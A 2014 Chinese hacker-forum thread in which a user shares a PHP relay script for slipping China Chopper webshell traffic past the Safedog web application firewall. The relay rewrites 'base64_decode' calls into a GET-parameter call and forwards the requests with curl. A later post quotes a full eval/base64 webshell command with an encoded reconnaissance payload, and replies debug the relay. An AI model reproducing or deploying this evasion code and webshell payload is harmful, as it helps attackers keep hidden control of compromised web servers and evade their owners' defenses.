查看: 22039|回复: 10

还是一句话过狗,php中转

[复制链接]
  • TA的每日心情

    2016-8-22 21:23
  • 签到天数: 15 天

    [LV.4]偶尔看看III

    发表于 2014-5-29 23:17:05 | 显示全部楼层 |阅读模式
    本帖最后由 beizidream 于 2014-5-29 23:18 编辑

    看到大牛们各种虐杀小狗,各种羡慕嫉妒恨, 于是自己弄个了简单的,
    将菜刀里面的关键字base64_encode用post中转

    一句话
    0.png
    生成中转
    1.png
    手动提交测试,还是妥妥的
    2.png
    放到菜刀,里面,结果。。。。
    4.png

    抓包调试,结果,结果,没有抓到,直接连一句话能抓到,中转脚本没有{:soso_e153:}

    核心代码
    [AppleScript] 纯文本查看 复制代码
    private function SendUrl($encodResult){
            if (strpos($this->config['url'],'?') === false) $url = $this->config['url'].'?124213=base64_decode';
            else $url = $this->config['url'].'&124213=base64_decode';
        	$postData = $_POST;
        	$data = str_replace("base64_decode(", '$_GET[124213](', $postData);
            $ch =curl_init($url);
            curl_setopt($ch, CURLOPT_POST, 1);
            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            curl_setopt($ch,CURLOPT_USERAGENT,'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0');
            $output = curl_exec($ch);
            curl_close($ch);
            echo $output;
        	
        }

       
    大神给点意见吧
    回复

    使用道具 举报

    该用户从未签到

    发表于 2014-5-30 09:08:02 | 显示全部楼层
    需要开启   CURL

    点评

    肯定开始了的,要不手动测试也通不过啊 手动测试中转完全正常  详情 回复 发表于 2014-5-30 09:27
    回复

    使用道具 举报

  • TA的每日心情

    2016-8-22 21:23
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2014-5-30 09:27:35 | 显示全部楼层
    buxuan 发表于 2014-5-30 09:08
    需要开启   CURL

    肯定开始了的,要不手动测试也通不过啊
    手动测试中转完全正常
    回复

    使用道具 举报

  • TA的每日心情

    2016-8-22 21:23
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2014-5-30 12:51:42 | 显示全部楼层
    来个php大年吧 , 简单的post参数中转没问题,参数像下面这个就完全没中转了

    123=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1kaXJuYW1lKCRfU0VSVkVSWyJTQ1JJUFRfRklMRU5BTUUiXSk7ZWNobyAkRC4iXHQiO2lmKHN1YnN0cigkRCwwLDEpIT0iLyIpe2ZvcmVhY2gocmFuZ2UoIkEiLCJaIikgYXMgJEwpaWYoaXNfZGlyKCRMLiI6IikpZWNobygkTC4iOiIpO307ZWNobygifDwtIik7ZGllKCk7

    用到这个curl完全没有操作了

    点评

    过狗可以,可是用来藏shell就不行了。。。 关键词 eval 直接定位-- 眼睛一看这样的代码就是高危代码.. 也只能用来过狗了  详情 回复 发表于 2014-6-3 16:57
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-8-22 21:23
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2014-5-30 14:16:48 | 显示全部楼层
    d.png
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-8-22 21:23
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2014-5-30 15:58:14 | 显示全部楼层
    问题解决了 一个人玩得好happy

    点评

    为何不参照下小影的中转呢  详情 回复 发表于 2014-5-31 15:23
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2017-6-22 13:45
  • 签到天数: 44 天

    [LV.5]常住居民I

    发表于 2014-5-31 15:23:01 | 显示全部楼层
    beizidream 发表于 2014-5-30 15:58
    问题解决了 一个人玩得好happy

    为何不参照下小影的中转呢
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-9-21 14:45
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2014-5-31 23:46:30 | 显示全部楼层
    hack.me 中转配置呢?

    点评

    hack.me 是我本地 127.0.0.1  详情 回复 发表于 2014-6-4 16:15
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-6-3 16:57:08 | 显示全部楼层
    beizidream 发表于 2014-5-30 12:51
    来个php大年吧 , 简单的post参数中转没问题,参数像下面这个就完全没中转了

    123=@eval(base64_decode($_P ...

    过狗可以,可是用来藏shell就不行了。。。
    关键词 eval 直接定位--
      眼睛一看这样的代码就是高危代码..
    也只能用来过狗了

    点评

    只是本地测试着玩的,  详情 回复 发表于 2014-6-4 16:16
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-8-22 21:23
  • 签到天数: 15 天

    [LV.4]偶尔看看III

     楼主| 发表于 2014-6-4 16:15:11 | 显示全部楼层
    blck 发表于 2014-5-31 23:46
    hack.me 中转配置呢?

    hack.me 是我本地 127.0.0.1
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-23 19:24 , Processed in 0.047857 second(s), 22 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部